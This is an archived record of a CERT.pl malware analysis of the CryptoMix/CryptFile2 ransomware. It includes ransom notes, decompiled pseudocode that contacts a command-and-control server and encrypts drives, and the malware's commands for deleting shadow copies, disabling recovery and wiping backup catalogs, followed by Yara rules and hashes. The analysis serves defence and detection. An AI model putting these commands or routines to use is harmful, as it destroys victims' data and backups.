{
	"id": "d24dc257-8c07-4376-98cb-8465baf04ea6",
	"created_at": "2026-04-06T00:21:00.656655Z",
	"updated_at": "2026-04-10T03:21:38.221177Z",
	"deleted_at": null,
	"sha1_hash": "af7d428f50137b7a36a4975678dfe98bc20a9bfd",
	"title": "Technical analysis of CryptoMix/CryptFile2 ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1446163,
	"plain_text": "Technical analysis of CryptoMix/CryptFile2 ransomware\r\nArchived: 2026-04-05 12:48:12 UTC\r\nCampaign\r\nCryptoMix is another ransomware family that is trying to earn money by encrypting victims files\r\nand coercing them into paying the ransom.\r\nUntil recently it was more known as CryptFile2, but for reasons unknown to us it was rebranded and\r\nnow it’s called CryptoMix.\r\nIt was observed in the wild being served by the Rig-V exploit kit.\r\nThis malware stands out from among others, but not necessarily in a good way.\r\nPrice\r\nFirst unusual thing about this family is very large amount of money requested – 5 bitcoins is an\r\ninsane amount of money (especially considering that CryptoMix is really primitive under the hood,\r\nbut we’ll get to it). We don’t know how many victims have paid, but probably few were desperate\r\nenough.\r\nAdditionally we have stumbled upon following comment discouraging anyone from paying the\r\nransom:\r\nhttps://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/\r\nPage 1 of 17\n\nDO NOT PAY FOR THIS!!!\r\nwe were infected and they asked for 10 bitcoins, after some negotiations the price was\r\nlowered to 6 bitcoins. they provided 1 decrypted file to prove concept. we paid 6 bitcoins\r\nand they asked for another .6 as the c\u0026c server will not provide the key due to late\r\npayment. after promptly paying another .6 bitcoins (about $4800 in total) there has been\r\nno communication from them! its been 2 weeks and nothing.\r\nWHATEVER YOU DO, DO NOT TRUST THEM, THEY WILL NOT DECRYPT\r\nYOUR FILES!!!!\r\nWe can’t verify if this is true, but it sounds plausible – if someone is desperate enough to pay 6\r\nbitcoins for his files, he probably can be coerced into paying even more. As usual, we discourage\r\nanyone from supporting the criminals by paying the ransom.\r\nPayment portal\r\nAdditionally CryptoMix doesn’t have any payment portal in the Tor network. 
Or any payment portal, for that matter – the victim has to write an email and literally wait some time before the malware operators kindly send the decryption keys (assuming that they will do it, instead of bargaining for even more money).\r\nFor example, the ransom message can look like this (most recent variant):\r\n_---CryptoMix---_\r\nNOT YOUR LANGUAGE? USE https://translate.google.com\r\nWhat happened to your files ?\r\nAll of your files protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here:\r\nhttps://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start send email now for more specific instructions! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 24 hours.\r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee.\r\nPlease do not waste your time! You have 72 hours only! 
After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private SoftWare with a low price!\r\nE-MAIL1: enc10@dr.com\r\nE-MAIL2: enc10@usa.com\r\nOr like this (older variant):\r\nNOT YOUR LANGUAGE? USE https://translate.google.com\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here:\r\nhttp://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours.\r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee.\r\nE-MAIL1: xoomx@dr.com\r\nE-MAIL2: xoomx@usa.com\r\nWe don’t think that this strategy was well thought out. First of all, using email for communication with victims is bothersome and needs constant attention. An automated portal would be much more reliable and secure for both sides. 
Additionally, email accounts are prone to being deleted or locked, effectively cutting the malware authors off from their “clients”.\r\nCharity\r\nThe content of the exchanged emails is very unusual too. The actors claim to be a charity organization (!) that is going to sponsor presents and medical help for children. For example:\r\nDear User,\r\nto decrypt your files You will need a special software with your special unique private key.\r\nPrice of software and your private key is 5 bitcoins. With this product you can decrypt all your files and protect Your system!!! Protect!!! Your system will be without any vulnerability.\r\nAlso You will have a FREE tech support for solving any PC troubles for 3 years!\r\nYou can buy bitcoins through this bitcoin web site https://localbitcoins.com/\r\nRegister there and find a nearest Bitcoin seller. It`s easy! Choose more comfortable payment method for buying Bitcoin!\r\nAfter that You should send 5 bitcoins to the bitcoin wallet address:\r\n[cut]\r\nAll this process is very easy! It`s like a simple money transfer.\r\nAnd now most important information:\r\nYour money will be spent for the children charity. So that is mean that You will get a participation in this process too. Many children will receive presents and medical help!\r\nAnd We trust that you are kind and honest person! Thank You very much! We wish You all the best! Your name will be in the main donors list and will stay in the charity history!\r\nP.S\u003e When your payment will be delivered you will receive your software with private key IMMEDIATELY!\r\nP.P.S\u003e In the next 24 hours your price will be doubled by the Main Server automatically. 
So now you have a chance to restore your PC with low price!\r\nBest regards,\r\nCharity Team\r\nThat’s really original, but unfortunately also obviously false.\r\nLeaving aside the strange quirks of the ransomware “interface”, let’s get more technical. At its heart, CryptoMix is just a bare-bones encryptor – it doesn’t have any fancy features, it doesn’t have a web portal, it doesn’t change the user’s wallpaper; the only thing it does is encrypt every file on the victim’s disks and on the mounted network drives.\r\nCryptoMix is protected by a very primitive packer – the real binary is stored in the resources, XORed with a hardcoded key. For some reason, Cuckoo has problems with automatic unpacking of CryptoMix, so we had to write our own unpacker. Using pefile and Yara this is very easy (in the snippet, m is the analysis helper object wrapping a pefile.PE instance and xor() is a repeating-key XOR helper; both belong to the unpacker script and are not shown here):\r\ndef try_decrypt_with(m, xorkey):\r\n    # walk every resource entry and try to XOR-decrypt its data with the key\r\n    for res in m.pe.DIRECTORY_ENTRY_RESOURCE.entries:\r\n        if res.name is not None or True:\r\n            res0 = res.directory.entries[0].directory.entries[0].data.struct\r\n            d = m.read(res0.OffsetToData, res0.Size)\r\n            decrypted = xor(d, xorkey)\r\n            if decrypted[:2] != \"MZ\":\r\n                continue\r\n            # compare the full DOS header to rule out accidental \"MZ\" matches\r\n            if decrypted[:16] != '4d5a90000300000004000000ffff0000'.decode('hex'):\r\n                print \"invalid decryption key/length\", len(xorkey)\r\n                continue\r\n            return decrypted\r\n\r\ndef process_yara_hit(m, hit, *args):\r\n    # hit is the offset of the Yara match; read the address operand of the\r\n    # matched instruction and fetch the 13-byte XOR key stored there\r\n    xoraddr = m.dword(hit+2)\r\n    xorkey = m.read(xoraddr, 13)\r\n    return try_decrypt_with(m, xorkey)\r\nAfter decryption, the ransomware checks whether it’s being debugged – but no anti-VM techniques are employed, so everything works as it should under VirtualBox.\r\nBefore file encryption starts, the ransomware checks internet connectivity (using the InternetOpenUrl function). 
If everything is OK, an encryption key is generated on the victim’s PC and sent to the C\u0026C server.\r\nOtherwise, depending on the malware version, either a hardcoded encryption key is used or the malware spins in an infinite loop until the internet connection is restored.\r\nThe main function can be expressed as follows:\r\nif ( !encryptionDone() ) // don't run on already encrypted system\r\n{\r\n    if ( !cryptomixInitialized() ) // don't run if already encrypting\r\n    {\r\n        initialize1(); // create registry keys, mutexes\r\n        initialize2(); // etc\r\n    }\r\n    // check internet connectivity (url is different for each version)\r\n    internetIsOk = internetOpenUrlA(\"http://217.23.7.105/ms_chek_os/ms_statistic_os_key.php?info=SCmvxag30Y35DIy7JTzxsJSTLJzUe67VbrPhiiCr4iIe\") == 1;\r\n    if ( !getExistingRsaKey() ) // check if key was already selected\r\n    {\r\n        if ( internetIsOk == 1 )\r\n            generateRsaKeyToRegistry(); // online mode - generate RSA key\r\n        else\r\n            saveKeyToRegistry((int)\u0026staticRsaKey, 268); // offline mode - use hardcoded key\r\n        if ( internetIsOk == 1 )\r\n            logEncryptionStatus(1); // upload generated key and OS info to C\u0026C server\r\n    }\r\n    keyData = globalAlloc(64, 268);\r\n    getKeyFromRegistry(\u0026keyData);\r\n    if ( keyData[0] || keyData[1] )\r\n        saveKeyToRegistry(keyData, 268);\r\n    else\r\n        keyData = (int)\u0026staticRsaKey;\r\n    GetWindowsDirectoryW(\u0026windowsDir, 260);\r\n    for (int i = 0; i \u003c 26; i++)\r\n    {\r\n        drive = (char)('A' + i);\r\n        wsprintf(\u0026v36, L\"%c:\", drive);\r\n        driveType = getDriveType(\u0026v36);\r\n        if ( driveType == DRIVE_REMOVABLE || driveType == DRIVE_FIXED || driveType == DRIVE_REMOTE )\r\n        {\r\n            if ( strstrw(\u0026windowsDir, \u0026v36) ) // check windows directory\r\n            {\r\n                recursiveEncryptDrive(\u0026v36, 
\u0026off_2D406C, keyData, 8);\r\n            }\r\n            else\r\n            {\r\n                recursiveEncryptDrive(\u0026v36, \u0026off_2D406C, keyData, 3);\r\n                sub_2D3BD3(\u0026v36);\r\n            }\r\n        }\r\n    }\r\n    if ( internetIsOk == 1 )\r\n        logEncryptionStatus(0);\r\n    setRegStatus(\"LesliDone\"); // save status to registry\r\n}\r\nAfter the encryption key is generated or selected, it is stored in the Windows registry. The registry key used for malware-specific data varies depending on the version; for example SoftWare\\Microsoft\\Windows\\Shell\\Nodes Slots, SoftWare\\Microsoft\\Windows\\Shell\\FlashPlayerPluginK or Software\\Adobe Reader LicensionSoftWare\\AdobeLicensionSoftWare can be used (the malware probably tries to hide its presence by impersonating other software).\r\nThe list of supported extensions contains more than 1250 entries:\r\n.3g2 .3gp .7z .ab4 .ach .adb .ads .ait .al .apj .asf .asm .asp .asx .back .bank\r\n.bgt .bik .bkf .bkp .bpw .c .cdf .cdr .cdx .ce1 .ce2 .odf .odg .odp .ods .oil\r\n.one .oth .otp .ots .p12 .p7b .p7c .pas .pat .pbo .pcd .pct .pem .php .pip .pl\r\n.plc .pot .potm .potx .ppam .pps .ppsm .ppsx .prf .psafe3 .pspimage .pub .puz\r\n.py .qba .qbw .r3d .raf .rar .rat .raw .rm .rwz .sas7bdat .say .sd0 .sda .snp\r\n.srf .srt .st4 .st5 .st6 .st7 .st8 .stc .std .sti .stx .sxc .sxi .sxm .vob .vsx\r\n.vtx .wav .wb2 .wll .wmv .wpd .x11 .xla .xlam .xlb .xlc .xll .xlm .xlr .xlsb\r\n.xlt .xltm .xltx .m4a .wma .d3dbsp .xlw .xpp .xsn .yuv .zip .sie .unrec .scan\r\n.sum .t13 .t12 .qdf .tax .pkpass .bc6 .bc7 .sidn .sidd .mddata .itl .icxs .hvpl\r\n.hplg .hkdb .mdbackup .syncdb .gho .cas .wmo .itm .sb .fos .mov .vdf .ztmp .sis\r\n.sid .ncf .menu .layout .dmp .blob .esm .vcf .vtf .dazip .fpk .mlx .kf .iwd\r\n.vpk .tor .psk .rim .w3x .fsh .ntl .arch00 .lvl .snx .cfr .ff .vpp_pc .lrf .m2\r\n.mcmeta .vfs0 .mpqge .db0 .dba .rofl .hkx .bar .upk .das .litemod .asset .forge\r\n.bsa .apk .re4 .lbf .slm 
.epk .rgss3a .pak .big .wallet .wotreplay .xxx .desc\r\n.m3u .js .rb .1cd .dbf .dt .cf .cfu .mxl .epf .kdbx .vrp .grs .geo .st .pff\r\n.mft .efd .3dm .3ds .rib .ma .sldasm .sldprt .max .blend .lwo .lws .m3d .mb\r\n.obj .x .x3d .movie .byu .c4d .fbx .dgn .dwg .4db .4dl .4mp .abs .accdb .accdc\r\n.accde .accdr .accdt .accdw .accft .adn .a3d .adp .aft .ahd .alf .ask .awdb\r\n.azz .bdb .bnd .bok .thumb .tjp .tm2 .tn .tpi .ufo .uga .usertile-ms .vda .vff\r\n.vpe .vst .wb1 .wbc .wbd .wbm .wbmp .wbz .wdp .webp .wpb .wpe .wvl .x3f .y .ysp\r\n.zif .cdr4 .cdr6 .cdrw .jpeg .djvu .pdf .ddoc .css .pptm .raw .cpt .jpg .jpe\r\n.jp2 .pcx .pdn .png .psd .tga .tiff .tif .hdp .xpm .ai .ps .wmf .emf .ani .apng\r\n.flc .fb2 .fb3 .fli .mng .smil .svg .mobi .swf .html .xls .xlsx .xlsm .xhtm\r\n.mrwref .xf .pst .bd .tar .gz .mkv .xml .xmlx .dat .mcl .mte .cfg .mp3 .btr\r\n.bak .backup .cdb .ckp .clkw .cma .daconnections .dacpac .dad .dadiagrams .daf\r\n.daschema .db .db-shm .db-wal .db2 .db3 .dbc .dbk .dbs .dbt .dbv .dbx .dcb .dct\r\n.dcx .ddl .df1 .dmo .dnc .dp1 .dqy .dsk .dsn .dta .dtsx .dxl .eco .ecx .edb\r\n.emd .eql .fcd .fdb .fic .fid .fm5 .fmp .fmp12 .fmpsl .fol .fp3 .fp4 .fp5 .fp7\r\n.fpt .fzb .fzv .gdb .gwi .hdb .his .ib .idc .ihx .itdb .itw .jtx .kdb .lgc .maq\r\n.mdb .mdbhtml .mdf .mdn .mdt .mrg .mud .mwb .s3m .myd .ndf .ns2 .ns3 .ns4 .nsf\r\n.nv2 .nyf .oce .odb .oqy .ora .orx .owc .owg .oyx .p96 .p97 .pan .pdb .pdm .phm\r\n.pnz .pth .pwa .qpx .qry .qvd .rctd .rdb .rpd .cer .cfp .class .cls .cmt .cpi\r\n.cpp .craw .crt .crw .cs .csh .csl .csv .dac .dbr .ddd .der .des .dgc .dng .drf\r\nhttps://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/\r\nPage 9 of 17\n\n.k2p .dtd .dxg .ebd .eml .exf .ffd .fff .fh .fhd .fla .flac .flv .fm .gray\r\n.grey .grw .gry .h .hpp .ibd .iif .indd .java .key .laccdb .lua .m .m4v .maf\r\n.mam .mar .maw .mdc .mde .mfw .mmw .mp4 .mpg .mpp .mrw .mso .ndd .nef .nk2 .nsd\r\n.nsg .nsh .nwb .nx1 .nx2 .odc .rsd .sbf .sdb .sdf 
.spq .sqb .stp .sql .sqlite\r\n.sqlite3 .sqlitedb .str .tcx .tdt .te .teacher .trm .udb .usr .v12 .vdb .vpd\r\n.wdb .wmdb .xdb .xld .xlgc .zdb .zdc .cdr3 .ppt .pptx .1st .abw .act .aim .ans\r\n.apt .asc .ascii .ase .aty .awp .awt .aww .bad .bbs .bdp .bdr .bean .bib .bna\r\n.boc .btd .bzabw .chart .chord .cnm .crd .crwl .cyi .dca .dgs .diz .dne .doc\r\n.docm .docx .docxml .docz .dot .dotm .dotx .dsv .dvi .dx .eio .eit .email .emlx\r\n.epp .err .etf .etx .euc .fadein .faq .fbl .fcf .fdf .fdr .fds .fdt .fdx .fdxt\r\n.fes .fft .flr .fodt .fountain .gtp .frt .fwdn .fxc .gdoc .gio .gpn .gthr .gv\r\n.hbk .hht .hs .htc .hwp .hz .idx .iil .ipf .jarvis .jis .joe .jp1 .jrtf .kes\r\n.klg .knt .kon .kwd .latex .lbt .lis .lit .lnt .lp2 .lrc .lst .ltr .ltx .lue\r\n.luf .lwp .lxfml .lyt .lyx .man .map .mbox .md5txt .me .mell .min .mnt .msg\r\n.mwp .nfo .njx .notes .now .nwctxt .nzb .ocr .odm .odo .odt .ofl .oft .openbsd\r\n.ort .ott .p7s .pages .pfs .pfx .pjt .plantuml .prt .psw .pu .pvj .pvm .pwi\r\n.pwr .qdl .rad .readme .rft .ris .rng .rpt .rst .rt .rtd .rtf .rtx .run .rzk\r\n.rzn .saf .safetext .sam .scc .scm .scriv .scrivx .scw .sdm .sdoc .sdw .sgm\r\n.sig .skcard .sla .slagz .sls .smf .sms .ssa .strings .stw .sty .sub .sxg .sxw\r\n.tab .tdf .text .thp .tlb .tm .tmd .tmv .tmx .tpc .trelby .tvj .txt .u3d .u3i\r\n.unauth .unx .uof .uot .upd .utf8 .unity .utxt .vct .vnt .vw .wbk .wcf .webdoc\r\n.wgz .wn .wp .wp4 .wp5 .wp6 .wp7 .wpa .wpl .wps .wpt .wpw .wri .wsc .dxf .egc\r\n.ep .eps .epsf .fh10 .fh11 .fh3 .fh4 .fh5 .fh6 .fh7 .fh8 .fif .fig .fmv .ft10\r\n.ft11 .ft7 .ft8 .ft9 .ftn .fxg .gdraw .gem .glox .gsd .hpg .hpgl .hpl .idea\r\n.igt .igx .imd .ink .lmk .mgcb .mgmf .mgmt .mt9 .mgmx .mgtx .mmat .mat .otg\r\n.ovp .ovr .pcs .pfd .pfv .pl .plt .vrml .pobj .psid .rdl .scv .sk1 .sk2 .slddrt\r\n.snagitstamps .snagstyles .ssk .stn .svf .svgz .sxd .tlc .tne .ufr .vbr .vec\r\nhttps://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/\r\nPage 10 of 
17\n\n.vml .vsd .vsdm .vsdx .vstm .stm .vstx .wpg .vsm .vault .xar .xmind .xmmap .yal\r\n.orf .ota .oti .ozb .ozj .ozt .pal .pano .pap .pbm .pc1 .pc2 .pc3 .pcd .pdd\r\n.pe4 .pef .pfi .pgf .pgm .pi1 .pi2 .pi3 .pic .pict .pix .pjpeg .pjpg .pm .pmg\r\n.pni .pnm .pntg .pop .pp4 .pp5 .ppm .prw .psdx .pse .psp .pspbrush .ptg .ptx\r\n.pvr .px .pxr .pz3 .pza .pzp .pzs .z3d .qmg .ras .rcu .rgb .rgf .ric .riff .rix\r\n.rle .rli .rpf .rri .rs .rsb .rsr .rw2 .rwl .s2mv .sai .sci .sct .sep .sfc\r\n.sfera .sfw .skm .sld .sob .spa .spe .sph .spj .spp .sr2 .srw .ste .sumo .sva\r\n.save .ssfn .t2b .tb0 .tbn .tex .tfc .tg4 .thm .qbi .qbr .cnt .v30 .qbo .lgb\r\n.qwc .qbp .aif .qby .1pa .qpd .set .nd .rtp .qbwin .log .qbbackup .tmp\r\n.temp1234 .qbt .qbsdk .syncmanagerlogger .ecml .qsm .qss .qst .fx0 .fx1 .mx0\r\n.fpx .fxr .fim .better_call_saul .breaking bad .heisenberg .ytbl .wsd .wsh .wtx\r\n.xbdoc .xbplate .xdl .xlf .xps .xwp .xy3 .xyp .xyw .ybk .yml .zabw .zw .2bp .0\r\n.36 .3fr .411 .73i .8xi .9png .abm .afx .agif .agp .aic .albm .apd .apm .aps\r\n.apx .artwork .arw .asw .avatar .bay .blkrt .bm2 .bmp .bmx .bmz .brk .brn .brt\r\n.bss .bti .c4 .cal .cals .can .cd5 .cdc .cdg .cimg .cin .cit .colz .cpc .cpd\r\n.cpg .cps .cpx .cr2 .ct .dc2 .dcr .dds .dgt .dib .djv .dm3 .dmi .vue .dpx .wire\r\n.drz .dt2 .dtw .dvl .ecw .eip .erf .exr .fal .fax .fil .fpos .g3 .gcdp .gfb\r\n.gfie .ggr .gif .gih .gim .gmbck .gmspr .spr .scad .gpd .gro .grob .hdr .hpi\r\n.i3d .icn .icpr .iiq .info .int .ipx .itc2 .iwi .j .j2c .j2k .jas .jb2 .jbig\r\n.jbig2 .jbmp .jbr .jfif .jia .jng .jpg2 .jps .jpx .jtf .jwl .jxr .kdc .kdi .kdk\r\n.kic .kpg .lbm .ljp .mac .mbm .mef .mnr .mos .mpf .mpo .mrxs .myl .ncr .nct\r\n.nlm .nrw .oc3 .oc4 .oc5 .oci .omf .oplc .af2 .af3 .ai .art .asy .cdmm .cdmt\r\n.cdmtz .cdmz .cdt .cgm .cmx .cnv .csy .cv5 .cvg .cvi .cvs .cvx .cwt .cxf .dcs\r\n.ded .design .dhs .dpp .drw .dxb .locky .micro .zepto .cerber3 .cerber .axx\r\n.ecc .crypt .ezz .r5a .ccc .exx .crypz .cerber2 .cerber4 
.cerber5 .odin\r\n.cryptowall .enciphered .cryptolocker .cryp1 .locked .crypted .lol! .encrypted\r\n.xxx .lechiffre .aesir .rrk .enigma .zzzzz .coverton .encrypt .good .wflx .ttt\r\n.zcrypt .aaa .access_denied .dharma .xtbl .crysis .vvv\r\nThat’s quite a lot of extensions, but nothing special (for comparison: CryptXXX supports 933 extensions, CrypMIC 901). The most unusual thing here is the inclusion of other ransomware families’ extensions (for example .zepto, .locky, .crypt, .locked, .cryptolocker, .cryptowall, etc.).\r\nEncryption\r\nLet’s get back to the ransom message for a while:\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server\r\nThe malware claims that our files are “encrypted with 2048bit RSA KEY”. Well, it’s not entirely true. Yes, a 2048-bit RSA key is generated with the Windows Crypto API – but after the RSA key is selected, it is hashed with SHA-256 to create the real encryption key, and every file on disk is encrypted with that key. 
The encryption algorithm used is AES-256 in CBC mode without an initialization vector.\r\nThe encryption routine can be summarized with this (simplified) code:\r\nrealEncrypt(void *rsaKey, _DWORD *sourceData, int dataSize, _DWORD *resultPointer)\r\n{\r\n    hHash = 0;\r\n    // 24 == PROV_RSA_AES, 0xF0000000 == CRYPT_VERIFYCONTEXT\r\n    if ( CryptAcquireContextW(\u0026hProvider, 0, 0, 24, 0xF0000000) )\r\n    {\r\n        if ( CryptCreateHash(hProvider, 32780, 0, 0, \u0026hHash) ) // 32780 == CALG_SHA_256\r\n        {\r\n            // hash the 268-byte (0x10C) RSA key blob and derive the AES-256 key from the digest\r\n            if ( CryptHashData(hHash, rsaKey, 0x10Cu, 0) \u0026\u0026 CryptDeriveKey(hProvider, CALG_AES_256, hHash, 1, \u0026hKey) )\r\n            {\r\n                // first call with a NULL data pointer only computes the required output size\r\n                if ( CryptEncrypt(hKey, 0, 1, 0, 0, \u0026dataSize, dataSize) )\r\n                {\r\n                    result = GlobalAlloc(0x40u, dataSize);\r\n                    if ( result )\r\n                    {\r\n                        rtlMoveMemory(result, *sourceData, dataSize);\r\n                        CryptEncrypt(hKey, 0, 1, 0, result, \u0026dataSize, dataSize); // encrypt the copy in place\r\n                    }\r\n                }\r\n            }\r\n        }\r\n    }\r\n}\r\nThis function is called for every file, so hashing rsaKey and deriving the AES key every time doesn’t make much sense. 
But there is a bigger problem with it – there is no need for such things as “public” and “private” keys, because this encryption routine is entirely symmetric – RSA serves here just as an (unnecessarily slow) random number generator.\r\nSo yes, in a way RSA is “used for encryption”, but the files are not encrypted with RSA and the encryption is entirely symmetric.\r\nThe UserID given by CryptoMix is not random – it is generated from the username and the serial number of the first disk.\r\nunsigned int getUpperUserIDDword()\r\n{\r\n    // the fourth argument of GetVolumeInformation receives the volume serial number;\r\n    // drive letters are tried in this fixed order until one of them succeeds\r\n    if ( getVolumeInfo(\"C:\\\\\", 0, 0, \u0026result, 0, 0, 0, 0) \u003c= 0 )\r\n    {\r\n        if ( getVolumeInfo(\"D:\\\\\", 0, 0, \u0026result, 0, 0, 0, 0) \u003c= 0 )\r\n        {\r\n            if ( getVolumeInfo(\"E:\\\\\", 0, 0, \u0026result, 0, 0, 0, 0) \u003c= 0 )\r\n            {\r\n                if ( getVolumeInfo(\"F:\\\\\", 0, 0, \u0026result, 0, 0, 0, 0) \u003c= 0 )\r\n                {\r\n                    if ( getVolumeInfo(\"G:\\\\\", 0, 0, \u0026result, 0, 0, 0, 0) \u003c= 0 )\r\n                    {\r\n                        if ( getVolumeInfo(\"H:\\\\\", 0, 0, \u0026result, 0, 0, 0, 0) \u003c= 0 )\r\n                        {\r\n                            if ( getVolumeInfo(\"Z:\\\\\", 0, 0, \u0026result, 0, 0, 0, 0) \u003c= 0 )\r\n                            {\r\n                                if ( getVolumeInfo(\"X:\\\\\", 0, 0, \u0026result, 0, 0, 0, 0) \u003c= 0 )\r\n                                {\r\n                                    getVolumeInfo(\"Y:\\\\\", 0, 0, \u0026result, 0, 0, 0, 0);\r\n                                }\r\n                            }\r\n                        }\r\n                    }\r\n                }\r\n            }\r\n        }\r\n    }\r\n    return result;\r\n}\r\nint getLowerUserIDDword()\r\n{\r\n    v6 = 261;\r\n    if ( getUserName(\u0026v4, \u0026v6) )\r\n    {\r\n        lowKeySource = \u0026v4;\r\n    }\r\n    else\r\n    {\r\n        v7 = 16;\r\n        if ( !getComputerName(\u0026v5, \u0026v7) )\r\n            return getLowKey();\r\n        lowKeySource = \u0026v5;\r\n    }\r\n    return trivialHashFunction(lowKeySource);\r\n}\r\nThis doesn’t seem like a good idea, because UserIDs absolutely have to be unique, and neither the username nor the volume serial number is designed to be unique – so userID 
collisions are possible and very plausible (after taking the low entropy of the userID and the birthday paradox into account).\r\nWhy is this a problem? Because when a UserID collision happens, the malware creators have no way of telling the two users apart – so they don’t know which encryption key belongs to which user, and can’t send the right one. It’s also possible that in case of a collision the old key will be overwritten in the database and lost.\r\nFinally, CryptoMix achieves persistence by copying itself to the user’s documents and writing to the HKEY_CURRENT_USER\\SoftWare\\Microsoft\\Windows\\CurrentVersion\\Run registry key.\r\nAs a final measure, all shadow copies are removed (if the user doesn’t have an admin account, a UAC window is shown first):\r\nShellExecuteW(0, 0, L\"cmd\", L\"/C \\tvssadmin.exe Delete Shadows /All /Quiet\", 0, 0);\r\nShellExecuteW1(v5, 0, 0, L\"cmd\", L\"/C \\twmic shadowcopy delete\", 0, 0);\r\nRtlZeroMemory(\u0026v20, 3);\r\nRtlZeroMemory1(\u0026v21, 10);\r\nfor (int i = 0; i \u003c 26; i++)\r\n{\r\n    // 90 - i walks the drive letters from 'Z' down to 'A'\r\n    wsprintf(\u0026v22, L\"/C vssadmin Delete Shadows /For=%c: /All /Quiet \", 90 - i);\r\n    ShellExecuteW2(0, 0, L\"cmd\", \u0026v22, 0, 0);\r\n}\r\nShellExecuteW3(v11, 0, 0, L\"cmd\", L\"/C net stop vss\", 0, 0);\r\nShellExecuteW4(v13, 0, 0, L\"cmd\", L\"/C bcdedit /set {default} recoveryenabled No\", 0, 0);\r\nShellExecuteW5(v15, 0, 0, L\"cmd\", L\"/C bcdedit /set {default} bootstatuspolicy ignoreallfailures\", 0, 0);\r\nreturn ShellExecuteW6(v17, 0, 0, L\"cmd\", L\"/C wbadmin delete catalog -quiet\", 0, 0);\r\nCryptomix Decryptor\r\nDue to a cryptographic flaw in the encryption, we are able to decrypt CryptoMix (and CryptFile2), but only sometimes and only if the files were encrypted with a vulnerable version.\r\nIf your files were encrypted by CryptoMix and you don’t want to pay a ransom, you can contact us at cert@cert.pl and we’ll see what we can 
do.\r\nPlease attach a single encrypted file without changing its filename after encryption (for example warnings.h.email[supl0@post.com]id[7e5973f5e0ce337d].lesli).\r\nHashes/patterns\r\nCryptomix packer (old and new):\r\nrule cryptomix_packer\r\n{\r\n    meta:\r\n        author = \"msm\"\r\n    strings:\r\n        $old_real_main = {8B [5] 8B [5] 03 ?? 89 ?? FC FF 55 FC}\r\n        $old_crypto_ops = {83 ?? 1F 83 ?? 60}\r\n        $old_crypto_xor = {8A 90 [4] 30 14 0E} // extract xor key from this\r\n        $new_crypto_ops = {03 85 [4] 88 10 EB ??}\r\n        $new_crypto_xor = {A1 [4] 89 45 ??} // extract xor key from this\r\n    condition:\r\n        2 of them\r\n}\r\nCryptomix payload (after unpacking):\r\nrule cryptomix_payload\r\n{\r\n    meta:\r\n        author = \"msm\"\r\n    strings:\r\n        $get_static_rsa = { 56 68 [4] E8 [4] 59 59 }\r\n        $get_final_message = { B9 ?? ?? 00 00 BE [4] 8D BD [4] [0-10] F3 A5}\r\n        $get_email_format = { FF 75 ?? 68 [4] 50 FF 55 [1] }\r\n        $get_rsa_reg_key = { 6A 00 68 [4] 68 01 00 00 80 FF D0 68 [4] }\r\n        $get_extension = { 68 3C 72 40 00 8D 4C ?? ?? 51 FF D0 }\r\n        $get_extensions_to_encrypt = { FF 74 24 [1] 68 [4] E8 [4] }\r\n        $get_extensions_to_encrypt_new = { 68 [4] BE [4] 56 FF D0 85 C0 }\r\n        $get_cnc_url = { 68 [4] E8 [4] 48 F7 D8 1B C0 40 }\r\n    condition:\r\n        3 of ($get_*)\r\n}\r\nhashes:\r\nc2f30cd537c79b6bcd292e6824ea874e sample0\r\nbefc0e43b38fe467ddc3ddd73150a9fc sample0 decrypted\r\n8c413e31f39a54abf78c3585444051f7 sample1\r\n0d1206246bf15c521474cee42f13fc09 sample1 decrypted\r\nb778bda5b97228c6e362c9c4ae004a19 sample2\r\n042a38a32cd20e3e190bb15b085b430a sample2 decrypted\r\nSource: https://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/"
	],
	"report_names": [
		"technical-analysis-of-cryptomixcryptfile2-ransomware"
	],
	"threat_actors": [],
	"ts_created_at": 1775434860,
	"ts_updated_at": 1775791298,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/af7d428f50137b7a36a4975678dfe98bc20a9bfd.pdf",
		"text": "https://archive.orkl.eu/af7d428f50137b7a36a4975678dfe98bc20a9bfd.txt",
